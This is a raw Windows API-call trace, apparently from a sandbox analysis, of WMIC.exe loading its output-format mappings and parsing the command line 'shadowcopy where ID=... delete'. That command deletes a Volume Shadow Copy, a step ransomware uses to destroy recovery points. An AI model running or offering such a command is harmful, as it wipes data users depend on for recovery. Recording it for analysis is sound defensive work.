(param_1="IMPERSONATE") returned 0xb [0113.552] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.552] SysStringLen (param_1="IMPERSONATE") returned 0xb [0113.552] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.552] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.552] SysStringLen (param_1="IMPERSONATE") returned 0xb [0113.552] malloc (_Size=0x30) returned 0x156b40 [0113.552] malloc (_Size=0x18) returned 0x156b80 [0113.553] SysStringLen (param_1="DELEGATE") returned 0x8 [0113.553] SysStringLen (param_1="IDENTIFY") returned 0x8 [0113.553] SysStringLen (param_1="DELEGATE") returned 0x8 [0113.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0113.553] SysStringLen (param_1="DELEGATE") returned 0x8 [0113.553] malloc (_Size=0x30) returned 0x156ba0 [0113.553] malloc (_Size=0x18) returned 0x156be0 [0113.553] malloc (_Size=0x30) returned 0x156c00 [0113.553] malloc (_Size=0x18) returned 0x156c40 [0113.553] SysStringLen (param_1="NONE") returned 0x4 [0113.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.553] SysStringLen (param_1="NONE") returned 0x4 [0113.553] malloc (_Size=0x30) returned 0x156c60 [0113.553] malloc (_Size=0x18) returned 0x156ca0 [0113.553] SysStringLen (param_1="CONNECT") returned 0x7 [0113.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.553] malloc (_Size=0x30) returned 0x156cc0 [0113.553] malloc (_Size=0x18) returned 0x156d00 [0113.553] SysStringLen (param_1="CALL") returned 0x4 [0113.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.553] SysStringLen (param_1="CALL") returned 0x4 [0113.553] SysStringLen (param_1="CONNECT") returned 0x7 [0113.553] malloc (_Size=0x30) returned 0x156d20 [0113.553] malloc (_Size=0x18) returned 0x156d60 [0113.553] SysStringLen (param_1="PKT") returned 0x3 [0113.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.553] SysStringLen (param_1="PKT") returned 0x3 [0113.553] SysStringLen (param_1="NONE") returned 0x4 [0113.553] SysStringLen (param_1="NONE") returned 0x4 [0113.554] SysStringLen (param_1="PKT") returned 0x3 [0113.554] malloc (_Size=0x30) returned 0x156d80 [0113.554] malloc (_Size=0x18) returned 0x156dc0 [0113.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.554] SysStringLen (param_1="NONE") returned 0x4 [0113.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.554] SysStringLen (param_1="PKT") returned 0x3 [0113.554] SysStringLen (param_1="PKT") returned 0x3 [0113.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.554] malloc (_Size=0x30) returned 0x158000 [0113.555] malloc (_Size=0x18) returned 0x156de0 [0113.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.555] SysStringLen (param_1="DEFAULT") returned 0x7 [0113.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.555] SysStringLen (param_1="PKT") returned 0x3 [0113.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0113.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0113.555] malloc (_Size=0x30) returned 0x158040 [0113.555] malloc (_Size=0x40) returned 0x156e00 [0113.555] malloc (_Size=0x20a) returned 0x156e50 [0113.555] GetSystemDirectoryW (in: lpBuffer=0x156e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0113.555] free (_Block=0x156e50) [0113.555] malloc (_Size=0x18) returned 0x156e50 [0113.555] malloc (_Size=0x18) returned 0x156e70 [0113.555] malloc (_Size=0x18) returned 0x156e90 [0113.555] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0113.555] SysStringLen (param_1="\\wbem\\") returned 0x6 [0113.556] free (_Block=0x156e50) [0113.556] free (_Block=0x156e70) [0113.556] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0113.556] free (_Block=0x156e90) [0113.556] malloc (_Size=0x18) returned 0x156e50 [0113.556] malloc (_Size=0x18) returned 0x156e70 [0113.556] malloc (_Size=0x18) returned 0x156e90 [0113.556] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0113.556] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0113.556] free (_Block=0x156e50) [0113.556] free (_Block=0x156e70) [0113.556] GetCurrentThreadId () returned 0xb10 [0113.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef4c0 | out: phkResult=0x1ef4c0*=0xf8) returned 0x0 [0113.556] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1ef510, lpcbData=0x1ef4b0*=0x400 | out: lpType=0x0, lpData=0x1ef510*=0x30, lpcbData=0x1ef4b0*=0x4) returned 0x0 [0113.557] _wcsicmp (_String1="0", _String2="1") returned -1 [0113.557] _wcsicmp (_String1="0", _String2="2") returned -2 [0113.557] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1ef4b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1ef4b0*=0x42) returned 0x0 [0113.557] malloc (_Size=0x86) returned 0x156eb0 [0113.557] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x156eb0, lpcbData=0x1ef4b0*=0x42 | out: lpType=0x0, lpData=0x156eb0*=0x25, lpcbData=0x1ef4b0*=0x42) returned 0x0 [0113.557] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0113.557] malloc (_Size=0x42) returned 0x156f40 [0113.557] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0113.557] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1ef510, lpcbData=0x1ef4b0*=0x400 | out: lpType=0x0, lpData=0x1ef510*=0x36, lpcbData=0x1ef4b0*=0xc) returned 0x0 [0113.557] _wtol (_String="65536") returned 65536 [0113.557] free (_Block=0x156eb0) [0113.557] RegCloseKey (hKey=0x0) returned 0x6 [0113.557] CoCreateInstance (in: rclsid=0xff467410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1ef9b8 | out: ppv=0x1ef9b8*=0x21871d0) returned 0x0 [0113.575] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x21871d0, xmlSource=0x1efb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x156e50), isSuccessful=0x1efb70 | out: isSuccessful=0x1efb70*=0xffff) returned 0x0 [0113.669] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21871d0, DOMElement=0x1ef9b0 | out: DOMElement=0x1ef9b0) returned 0x0 [0113.669] malloc (_Size=0x18) returned 0x156e50 [0113.670] free (_Block=0x156e50) [0113.670] malloc (_Size=0x18) returned 0x156e50 [0113.670] free (_Block=0x156e50) [0113.670] malloc (_Size=0x18) returned 0x156e50 [0113.670] malloc (_Size=0x18) returned 0x156e70 [0113.670] malloc (_Size=0x30) returned 0x158080 [0113.671] malloc (_Size=0x18) returned 0x156eb0 [0113.671] free (_Block=0x156eb0) [0113.671] malloc (_Size=0x18) returned 0x15c560 [0113.671] malloc (_Size=0x18) returned 0x15c580 [0113.671] SysStringLen (param_1="VALUE") returned 0x5 [0113.671] SysStringLen (param_1="TABLE") returned 0x5 [0113.671] SysStringLen (param_1="TABLE") returned 0x5 [0113.671] SysStringLen (param_1="VALUE") returned 0x5 [0113.671] malloc (_Size=0x30) returned 0x1580c0 [0113.671] malloc (_Size=0x18) returned 0x15c5a0 [0113.672] free (_Block=0x15c5a0) [0113.672] malloc (_Size=0x18) returned 0x15c5a0 [0113.672] malloc (_Size=0x18) returned 0x15c5c0 [0113.672] SysStringLen (param_1="LIST") returned 0x4 [0113.672] SysStringLen (param_1="TABLE") returned 0x5 [0113.672] malloc (_Size=0x30) returned 0x158100 [0113.672] malloc (_Size=0x18) returned 0x15c5e0 [0113.672] free (_Block=0x15c5e0) [0113.672] malloc (_Size=0x18) returned 0x15c5e0 [0113.672] malloc (_Size=0x18) returned 0x15c600 [0113.672] SysStringLen (param_1="RAWXML") returned 0x6 [0113.672] SysStringLen (param_1="TABLE") returned 0x5 [0113.672] SysStringLen (param_1="RAWXML") returned 0x6 [0113.672] SysStringLen (param_1="LIST") returned 0x4 [0113.672] SysStringLen (param_1="LIST") returned 0x4 [0113.672] SysStringLen (param_1="RAWXML") returned 0x6 [0113.672] malloc (_Size=0x30) returned 0x158140 [0113.673] malloc (_Size=0x18) returned 0x15c620 [0113.673] free (_Block=0x15c620) [0113.673] malloc (_Size=0x18) returned 0x15c620 [0113.673] malloc (_Size=0x18) returned 0x15c640 [0113.673] SysStringLen (param_1="HTABLE") returned 0x6 [0113.673] SysStringLen (param_1="TABLE") returned 0x5 [0113.673] SysStringLen (param_1="HTABLE") returned 0x6 [0113.673] SysStringLen (param_1="LIST") returned 0x4 [0113.673] malloc (_Size=0x30) returned 0x158180 [0113.673] malloc (_Size=0x18) returned 0x15c660 [0113.673] free (_Block=0x15c660) [0113.673] malloc (_Size=0x18) returned 0x15c660 [0113.673] malloc (_Size=0x18) returned 0x15c680 [0113.673] SysStringLen (param_1="HFORM") returned 0x5 [0113.673] SysStringLen (param_1="TABLE") returned 0x5 [0113.674] SysStringLen (param_1="HFORM") returned 0x5 [0113.674] SysStringLen (param_1="LIST") returned 0x4 [0113.674] SysStringLen (param_1="HFORM") returned 0x5 [0113.674] SysStringLen (param_1="HTABLE") returned 0x6 [0113.674] malloc (_Size=0x30) returned 0x1581c0 [0113.674] malloc (_Size=0x18) returned 0x15c6a0 [0113.674] free (_Block=0x15c6a0) [0113.674] malloc (_Size=0x18) returned 0x15c6a0 [0113.674] malloc (_Size=0x18) returned 0x15c6c0 [0113.674] SysStringLen (param_1="XML") returned 0x3 [0113.674] SysStringLen (param_1="TABLE") returned 0x5 [0113.674] SysStringLen (param_1="XML") returned 0x3 [0113.674] SysStringLen (param_1="VALUE") returned 0x5 [0113.674] SysStringLen (param_1="VALUE") returned 0x5 [0113.674] SysStringLen (param_1="XML") returned 0x3 [0113.674] malloc (_Size=0x30) returned 0x158200 [0113.674] malloc (_Size=0x18) returned 0x15c6e0 [0113.675] free (_Block=0x15c6e0) [0113.675] malloc (_Size=0x18) returned 0x15c6e0 [0113.675] malloc (_Size=0x18) returned 0x15c700 [0113.675] SysStringLen (param_1="MOF") returned 0x3 [0113.675] SysStringLen (param_1="TABLE") returned 0x5 [0113.675] SysStringLen (param_1="MOF") returned 0x3 [0113.675] SysStringLen (param_1="LIST") returned 0x4 [0113.675] SysStringLen (param_1="MOF") returned 0x3 [0113.675] SysStringLen (param_1="RAWXML") returned 0x6 [0113.675] SysStringLen (param_1="LIST") returned 0x4 [0113.675] SysStringLen (param_1="MOF") returned 0x3 [0113.675] malloc (_Size=0x30) returned 0x158240 [0113.675] malloc (_Size=0x18) returned 0x15c720 [0113.675] free (_Block=0x15c720) [0113.675] malloc (_Size=0x18) returned 0x15c720 [0113.675] malloc (_Size=0x18) returned 0x15c740 [0113.675] SysStringLen (param_1="CSV") returned 0x3 [0113.675] SysStringLen (param_1="TABLE") returned 0x5 [0113.675] SysStringLen (param_1="CSV") returned 0x3 [0113.675] SysStringLen (param_1="LIST") returned 0x4 [0113.676] SysStringLen (param_1="CSV") returned 0x3 [0113.676] SysStringLen (param_1="HTABLE") returned 0x6 [0113.676] SysStringLen (param_1="CSV") returned 0x3 [0113.676] SysStringLen (param_1="HFORM") returned 0x5 [0113.676] malloc (_Size=0x30) returned 0x158280 [0113.676] malloc (_Size=0x18) returned 0x15c760 [0113.676] free (_Block=0x15c760) [0113.676] malloc (_Size=0x18) returned 0x15c760 [0113.676] malloc (_Size=0x18) returned 0x15c780 [0113.676] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.676] SysStringLen (param_1="TABLE") returned 0x5 [0113.676] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.676] SysStringLen (param_1="VALUE") returned 0x5 [0113.676] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.676] SysStringLen (param_1="XML") returned 0x3 [0113.676] SysStringLen (param_1="XML") returned 0x3 [0113.676] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.676] malloc (_Size=0x30) returned 0x1582c0 [0113.676] malloc (_Size=0x18) returned 0x15c7a0 [0113.677] free (_Block=0x15c7a0) [0113.677] malloc (_Size=0x18) returned 0x15c7a0 [0113.677] malloc (_Size=0x18) returned 0x15c7c0 [0113.677] SysStringLen (param_1="texttablewsys") returned 0xd [0113.677] SysStringLen (param_1="TABLE") returned 0x5 [0113.677] SysStringLen (param_1="texttablewsys") returned 0xd [0113.677] SysStringLen (param_1="XML") returned 0x3 [0113.677] SysStringLen (param_1="texttablewsys") returned 0xd [0113.677] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.677] SysStringLen (param_1="XML") returned 0x3 [0113.677] SysStringLen (param_1="texttablewsys") returned 0xd [0113.677] malloc (_Size=0x30) returned 0x158300 [0113.677] malloc (_Size=0x18) returned 0x15c7e0 [0113.677] free (_Block=0x15c7e0) [0113.677] malloc (_Size=0x18) returned 0x15c7e0 [0113.677] malloc (_Size=0x18) returned 0x15c800 [0113.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.678] SysStringLen (param_1="TABLE") returned 0x5 [0113.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.678] SysStringLen (param_1="XML") returned 0x3 [0113.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.678] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.678] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.678] malloc (_Size=0x30) returned 0x158340 [0113.678] malloc (_Size=0x18) returned 0x15c820 [0113.678] free (_Block=0x15c820) [0113.678] malloc (_Size=0x18) returned 0x15c820 [0113.678] malloc (_Size=0x18) returned 0x15c840 [0113.678] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.678] SysStringLen (param_1="TABLE") returned 0x5 [0113.678] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.678] SysStringLen (param_1="XML") returned 0x3 [0113.678] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.678] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.678] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.678] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.678] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.678] malloc (_Size=0x30) returned 0x158380 [0113.679] malloc (_Size=0x18) returned 0x15c860 [0113.679] free (_Block=0x15c860) [0113.679] malloc (_Size=0x18) returned 0x15c860 [0113.679] malloc (_Size=0x18) returned 0x15c880 [0113.679] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.679] SysStringLen (param_1="TABLE") returned 0x5 [0113.679] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.679] SysStringLen (param_1="XML") returned 0x3 [0113.679] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.679] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.679] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.679] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.679] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.679] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.679] malloc (_Size=0x30) returned 0x1583c0 [0113.679] malloc (_Size=0x18) returned 0x15c8a0 [0113.679] free (_Block=0x15c8a0) [0113.679] malloc (_Size=0x18) returned 0x15c8a0 [0113.679] malloc (_Size=0x18) returned 0x15c8c0 [0113.680] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.680] SysStringLen (param_1="TABLE") returned 0x5 [0113.680] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.680] SysStringLen (param_1="XML") returned 0x3 [0113.680] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.680] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.680] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.680] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.680] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.680] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.680] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.680] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0113.680] malloc (_Size=0x30) returned 0x158400 [0113.680] malloc (_Size=0x18) returned 0x15c8e0 [0113.680] free (_Block=0x15c8e0) [0113.680] malloc (_Size=0x18) returned 0x15c8e0 [0113.680] malloc (_Size=0x18) returned 0x15c900 [0113.680] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.680] SysStringLen (param_1="TABLE") returned 0x5 [0113.680] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.680] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.680] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.680] SysStringLen (param_1="XML") returned 0x3 [0113.680] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.680] SysStringLen (param_1="texttablewsys") returned 0xd [0113.680] SysStringLen (param_1="XML") returned 0x3 [0113.681] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.681] malloc (_Size=0x30) returned 0x158440 [0113.681] malloc (_Size=0x18) returned 0x15c920 [0113.681] free (_Block=0x15c920) [0113.681] malloc (_Size=0x18) returned 0x15c920 [0113.681] malloc (_Size=0x18) returned 0x15c940 [0113.681] SysStringLen (param_1="htable-sortby") returned 0xd [0113.681] SysStringLen (param_1="TABLE") returned 0x5 [0113.681] SysStringLen (param_1="htable-sortby") returned 0xd [0113.681] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.681] SysStringLen (param_1="htable-sortby") returned 0xd [0113.681] SysStringLen (param_1="XML") returned 0x3 [0113.681] SysStringLen (param_1="htable-sortby") returned 0xd [0113.681] SysStringLen (param_1="texttablewsys") returned 0xd [0113.681] SysStringLen (param_1="htable-sortby") returned 0xd [0113.681] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0113.681] SysStringLen (param_1="XML") returned 0x3 [0113.681] SysStringLen (param_1="htable-sortby") returned 0xd [0113.681] malloc (_Size=0x30) returned 0x158480 [0113.681] malloc (_Size=0x18) returned 0x15c960 [0113.682] free (_Block=0x15c960) [0113.682] malloc (_Size=0x18) returned 0x15c960 [0113.682] malloc (_Size=0x18) returned 0x15c980 [0113.682] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.682] SysStringLen (param_1="TABLE") returned 0x5 [0113.682] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.682] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.682] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.682] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.682] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.682] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.682] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.682] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.682] malloc (_Size=0x30) returned 0x1584c0 [0113.682] malloc (_Size=0x18) returned 0x15c9a0 [0113.682] free (_Block=0x15c9a0) [0113.682] malloc (_Size=0x18) returned 0x15c9a0 [0113.682] malloc (_Size=0x18) returned 0x15c9c0 [0113.682] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.682] SysStringLen (param_1="TABLE") returned 0x5 [0113.682] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.683] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.683] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.683] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.683] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.683] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0113.683] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.683] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0113.683] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.683] SysStringLen (param_1="wmiclimofformat") returned 0xf [0113.683] malloc (_Size=0x30) returned 0x158500 [0113.683] malloc (_Size=0x18) returned 0x15c9e0 [0113.683] free (_Block=0x15c9e0) [0113.683] malloc (_Size=0x18) returned 0x15c9e0 [0113.683] malloc (_Size=0x18) returned 0x15ca00 [0113.683] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.683] SysStringLen (param_1="TABLE") returned 0x5 [0113.683] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.683] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.683] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.683] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.683] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.683] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.684] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.684] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.684] malloc (_Size=0x30) returned 0x158540 [0113.684] malloc (_Size=0x18) returned 0x15ca20 [0113.684] free (_Block=0x15ca20) [0113.684] malloc (_Size=0x18) returned 0x15ca20 [0113.684] malloc (_Size=0x18) returned 0x15ca40 [0113.684] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.684] SysStringLen (param_1="TABLE") returned 0x5 [0113.684] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.684] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0113.684] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.684] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0113.684] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.684] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.684] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.684] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0113.684] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0113.684] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0113.684] malloc (_Size=0x30) returned 0x158580 [0113.685] FreeThreadedDOMDocument:IUnknown:Release (This=0x21871d0) returned 0x0 [0113.685] free (_Block=0x156e90) [0113.685] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" [0113.685] malloc (_Size=0xe0) returned 0x15cd30 [0113.685] memcpy_s (in: _Destination=0x15cd30, _DestinationSize=0xde, _Source=0x2825be, _SourceSize=0xd0 | out: _Destination=0x15cd30) returned 0x0 [0113.685] malloc (_Size=0x18) returned 0x15ca60 [0113.685] malloc (_Size=0x18) returned 0x15ca80 [0113.685] malloc (_Size=0x18) returned 0x15caa0 [0113.685] malloc (_Size=0x18) returned 0x15cac0 [0113.685] malloc (_Size=0x80) returned 0x156e90 [0113.685] GetLocalTime (in: lpSystemTime=0x1efb50 | out: lpSystemTime=0x1efb50*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x12, wMilliseconds=0xcf)) [0113.685] _vsnwprintf (in: _Buffer=0x156e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1efaa8 | out: _Buffer="09-04-2020T08:55:18") returned 19 [0113.685] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.685] malloc (_Size=0x90) returned 0x1570a0 [0113.685] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.685] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.685] malloc (_Size=0x90) returned 0x15ce20 [0113.685] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.685] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.685] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.685] malloc (_Size=0x16) returned 0x15cae0 [0113.686] lstrlenW (lpString="shadowcopy") returned 10 [0113.686] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0113.686] malloc (_Size=0x16) returned 0x15cb00 [0113.686] malloc (_Size=0x8) returned 0x157140 [0113.686] free (_Block=0x0) [0113.686] free (_Block=0x15cae0) [0113.686] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.686] malloc (_Size=0xc) returned 0x15cae0 [0113.686] lstrlenW (lpString="where") returned 5 [0113.686] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0113.686] malloc (_Size=0xc) returned 0x15cb20 [0113.686] malloc (_Size=0x10) returned 0x15cb40 [0113.686] memmove_s (in: _Destination=0x15cb40, _DestinationSize=0x8, _Source=0x157140, _SourceSize=0x8 | out: _Destination=0x15cb40) returned 0x0 [0113.686] free (_Block=0x157140) [0113.686] free (_Block=0x0) [0113.686] free (_Block=0x15cae0) [0113.686] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.686] malloc (_Size=0x5c) returned 0x15cec0 [0113.686] lstrlenW (lpString="\"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\"") returned 45 [0113.686] _wcsicmp (_String1="\"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\"", _String2="\"NULL\"") returned -5 [0113.686] lstrlenW (lpString="\"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\"") returned 45 [0113.686] lstrlenW (lpString="\"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\"") returned 45 [0113.686] malloc (_Size=0x5c) returned 0x15cf30 [0113.686] malloc (_Size=0x18) returned 0x15cae0 [0113.686] memmove_s (in: _Destination=0x15cae0, _DestinationSize=0x10, _Source=0x15cb40, _SourceSize=0x10 | out: _Destination=0x15cae0) returned 0x0 [0113.686] free (_Block=0x15cb40) [0113.686] free (_Block=0x0) [0113.686] free (_Block=0x15cec0) [0113.686] lstrlenW (lpString=" shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete") returned 71 [0113.686] malloc (_Size=0xe) returned 0x15cb40 [0113.686] lstrlenW (lpString="delete") returned 6 [0113.686] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0113.686] malloc (_Size=0xe) returned 0x15cb60 [0113.686] malloc (_Size=0x20) returned 0x15cec0 [0113.687] memmove_s (in: _Destination=0x15cec0, _DestinationSize=0x18, _Source=0x15cae0, _SourceSize=0x18 | out: _Destination=0x15cec0) returned 0x0 [0113.687] free (_Block=0x15cae0) [0113.687] free (_Block=0x0) [0113.687] free (_Block=0x15cb40) [0113.687] malloc (_Size=0x20) returned 0x15cef0 [0113.687] lstrlenW (lpString="QUIT") returned 4 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0113.687] lstrlenW (lpString="EXIT") returned 4 [0113.687] lstrlenW (lpString="shadowcopy") returned 10 [0113.687] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0113.687] free (_Block=0x15cef0) [0113.687] WbemLocator:IUnknown:AddRef (This=0x1ce1390) returned 